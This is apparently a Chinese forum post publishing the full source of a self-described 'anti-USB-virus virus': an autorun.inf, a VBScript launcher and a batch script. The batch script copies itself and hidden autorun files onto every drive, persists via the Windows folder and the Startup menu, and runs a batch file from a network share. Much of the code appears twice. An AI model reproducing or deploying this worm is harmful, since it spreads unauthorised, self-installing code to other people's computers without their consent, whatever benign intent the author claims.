此腳本主要由autorun.inf、u.bat、u.vbe等組成,源代碼如下:(爲避免他人惡意修改,部分代碼作了修改)
autorun.inf
[quote][AutoRun]
open=wscript.exe u.vbe
shell/open/Command=wscript.exe u.vbe
shell/explore/Command=wscript.exe u.vbe
shell/find/Command=wscript.exe u.vbe
[/quote]
u.vbe
[quote]
wscript.createobject("wscript.shell").run """u.bat"" /start",0[/quote]
wscript.createobject("wscript.shell").run """u.bat"" /start",0[/quote]
U.bat
[quote]
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0/" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%/8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%/bakfiles/"
call:ie "%systemroot%/bakfiles/將文件拖到本圖標上以解壓還原文件.bat"
copy uda-解壓.bat "%systemroot%/bakfiles/將文件拖到本圖標上以解壓還原文件.bat"
call:ie "%systemroot%/bakfiles/uda.a"
call:copy uda.a "%systemroot%/bakfiles/"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call //192.168.2.211/re$/add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%/autorun.inf/" (echo.y|cacls "%d%/autorun.inf" /p everyone:f
rd "%d%/autorun.inf" /s /q)
if exist "%d%/autorun.inf" (fc "%d%/autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盤病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%/%~n0.vbe" (goto s2)
if not exist "%d%/%~nx0" (goto s3)
if not exist "%d%/uda.a" (goto s4)
if exist %d%/%date:~0,10%.sk (goto s)
:s1
call:inf >%d%/autorun.inf
attrib %d%/autorun.inf +a +s +r +h
call:ie "%d%/%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%/%~n0.vbe"
attrib "%d%/%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%/"
:s4
call:copy "uda.a" "%d%/"
call:ie %d%/*.sk
echo.>%d%/%date:~0,10%.sk
attrib %d%/%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%/uhere-*.txt" (del /a /f /q "%systemroot%/uhere-*.txt"&s.vbe)
if exist "%systemroot%/uhere-*.txt" (if exist "%systemroot%/uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%/uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%/已經被反U盤病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%/"
call:copy "uda.a" "%systemroot%/"
call:ie "%systemroot%/%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%/%~n0.vbe"
call:ie "%ALLUSERSPROFILE%/「開始」菜單/程序/啓動/%~n0.vbe"
call:vbe "%systemroot%/%~nx0" >"%ALLUSERSPROFILE%/「開始」菜單/程序/啓動/%~n0.vbe"
start "" /wait /d "%systemroot%/" "%systemroot%/%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
echo. 看到這個,請不要慌張。電腦病毒的定義爲:1、傳播性;2、潛伏性;3、破壞性。根據此定義,本腳本這完全符合1,有點符合2,不符合3(若說破壞性也不是沒有,但只針對U盤病毒,而且會在刪除文件前備份,備份地址:%systemroot%/bakfiles/),因此,病毒二字加了引號,即不是真正的病毒。本腳本的目的是通過U盤傳播,並沿途清理U盤中的病毒,如果可能,會把收集到的病毒文件發給作者;不會給您造成太多不便(與其被U盤病毒感染,不如被本腳本感染啦)。如果您覺得這樣給您造成了不便,想卸載本腳本,請在%systemdrive%/下新建一個名爲8bye的文本文件(不需要寫入內容,即:新建%endf%),大約在20秒內完成卸載,並幫助您進行U盤病毒免疫。欲瞭解更多,請打開 U盤病毒分析 的自述文件(地址:%systemroot%/readme.txt)。謝謝!
echo. 包含文件:u.bat(本文件,4240字節)、uda.a(21674字節,md5:e6762ebf6123bc17ab31995c61bba955)
echo. 爲研究性學習而製作,於2007-03-15,望多多支持!作者:CyyIsGood(肇中高一11),聯繫:[email protected]
goto :eof
:vbe
echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell/open/Command=wscript.exe %~n0.vbe
echo.shell/explore/Command=wscript.exe %~n0.vbe
echo.shell/find/Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%/"
del /a /f /q Anti-U盤免疫.bat ReadMe.txt uda-解壓.bat U盤病毒分析.bat zap.a 主操控.bat 打開發送功能.bat
cd /d "%~dp0"
goto :eof
:end
set d=!dl:~%n%,1!
echo.%d%:/
if exist %d%:/ (del /a /f /q %d%:/u.vbe %d%:/u.bat %d%:/uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盤病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%/已經被反U盤病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%/「開始」菜單/程序/啓動/%~n0.vbe" "%~nx0"
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0/" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%/8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%/bakfiles/"
call:ie "%systemroot%/bakfiles/將文件拖到本圖標上以解壓還原文件.bat"
copy uda-解壓.bat "%systemroot%/bakfiles/將文件拖到本圖標上以解壓還原文件.bat"
call:ie "%systemroot%/bakfiles/uda.a"
call:copy uda.a "%systemroot%/bakfiles/"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call //192.168.2.211/re$/add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%/autorun.inf/" (echo.y|cacls "%d%/autorun.inf" /p everyone:f
rd "%d%/autorun.inf" /s /q)
if exist "%d%/autorun.inf" (fc "%d%/autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盤病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%/%~n0.vbe" (goto s2)
if not exist "%d%/%~nx0" (goto s3)
if not exist "%d%/uda.a" (goto s4)
if exist %d%/%date:~0,10%.sk (goto s)
:s1
call:inf >%d%/autorun.inf
attrib %d%/autorun.inf +a +s +r +h
call:ie "%d%/%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%/%~n0.vbe"
attrib "%d%/%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%/"
:s4
call:copy "uda.a" "%d%/"
call:ie %d%/*.sk
echo.>%d%/%date:~0,10%.sk
attrib %d%/%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%/uhere-*.txt" (del /a /f /q "%systemroot%/uhere-*.txt"&s.vbe)
if exist "%systemroot%/uhere-*.txt" (if exist "%systemroot%/uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%/uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%/已經被反U盤病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%/"
call:copy "uda.a" "%systemroot%/"
call:ie "%systemroot%/%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%/%~n0.vbe"
call:ie "%ALLUSERSPROFILE%/「開始」菜單/程序/啓動/%~n0.vbe"
call:vbe "%systemroot%/%~nx0" >"%ALLUSERSPROFILE%/「開始」菜單/程序/啓動/%~n0.vbe"
start "" /wait /d "%systemroot%/" "%systemroot%/%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
echo. 看到這個,請不要慌張。電腦病毒的定義爲:1、傳播性;2、潛伏性;3、破壞性。根據此定義,本腳本這完全符合1,有點符合2,不符合3(若說破壞性也不是沒有,但只針對U盤病毒,而且會在刪除文件前備份,備份地址:%systemroot%/bakfiles/),因此,病毒二字加了引號,即不是真正的病毒。本腳本的目的是通過U盤傳播,並沿途清理U盤中的病毒,如果可能,會把收集到的病毒文件發給作者;不會給您造成太多不便(與其被U盤病毒感染,不如被本腳本感染啦)。如果您覺得這樣給您造成了不便,想卸載本腳本,請在%systemdrive%/下新建一個名爲8bye的文本文件(不需要寫入內容,即:新建%endf%),大約在20秒內完成卸載,並幫助您進行U盤病毒免疫。欲瞭解更多,請打開 U盤病毒分析 的自述文件(地址:%systemroot%/readme.txt)。謝謝!
echo. 包含文件:u.bat(本文件,4240字節)、uda.a(21674字節,md5:e6762ebf6123bc17ab31995c61bba955)
echo. 爲研究性學習而製作,於2007-03-15,望多多支持!作者:CyyIsGood(肇中高一11),聯繫:[email protected]
goto :eof
:vbe
echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell/open/Command=wscript.exe %~n0.vbe
echo.shell/explore/Command=wscript.exe %~n0.vbe
echo.shell/find/Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%/"
del /a /f /q Anti-U盤免疫.bat ReadMe.txt uda-解壓.bat U盤病毒分析.bat zap.a 主操控.bat 打開發送功能.bat
cd /d "%~dp0"
goto :eof
:end
set d=!dl:~%n%,1!
echo.%d%:/
if exist %d%:/ (del /a /f /q %d%:/u.vbe %d%:/u.bat %d%:/uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盤病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%/已經被反U盤病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%/「開始」菜單/程序/啓動/%~n0.vbe" "%~nx0"
[/quote]